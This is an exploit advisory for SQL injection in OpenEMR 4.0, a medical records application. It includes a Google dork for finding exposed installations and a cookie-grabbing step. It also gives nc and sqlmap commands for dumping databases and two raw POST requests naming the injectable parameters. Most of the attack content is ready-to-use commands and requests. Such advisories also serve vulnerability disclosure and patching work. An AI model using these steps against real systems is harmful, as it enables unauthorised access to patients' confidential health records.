Open EMR 4.0 SQL Injection

2011-10-21T00:00:00
ID PACKETSTORM:106079
Type packetstorm
Reporter Houssam Sahli
Modified 2011-10-21T00:00:00

Description

                                        
                                            `# Exploit Title: Open EMR  
# Google Dork: inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"  
# Date: 3 / 08 / 2011 .  
# Author: Mehdi Boukazoula ; Houssam Sahli .  
# Software Link with patch : http://www.oemr.org/wiki/OpenEMR_Downloads  
# Version: v 4.0 full patched  
# Tested on: v 4.0  
# Description : the authenticated user can exploit this vulnerability by getting the cookie from browser using url javascript:alert(document.cookie) ,put it in request file with sql command and exploit:  
  
root@# cat request.txt | nc -vv yourhost 80  
or simply use sqlmap like this :  
root@# sqlmap -r request.txt -p "YOUR PARAMETER" --dbs  
--------------------------------------------------------------------------------------------------------  
  
---Request1 : Affected parameters : provider_id + pc_category  
POST http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search HTTP/1.1  
Accept-language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-encoding: identity  
Keep-alive: 115  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
User-agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10  
Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Host: 127.0.0.1  
Referer: http://127.0.0.1/openemr/interface/main/calendar/index.php?module=PostCalendar&func=search  
Cookie: PUT-THE-COOKIE-HERE  
Content-type: application/x-www-form-urlencoded  
Proxy-connection: keep-alive  
  
pc_keywords=bob&provider_id=_ALL_&end=08/10/2011&pc_category=&submit=Submit&start=08/03/2011&pc_keywords_andor=AND&pc_facility=  
--------------------------------------------------------------  
---Request2 : Affected parameters : form_patient_id  
POST http://127.0.0.1/openemr/interface/reports/chart_location_activity.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 Paros/3.2.13  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
Referer: http://127.0.0.1/openemr/interface/reports/chart_location_activity.php  
Cookie: PUT-THE-COOKIE-HERE  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
  
form_refresh=true&form_patient_id=patient  
---------------------------------------------------------------  
`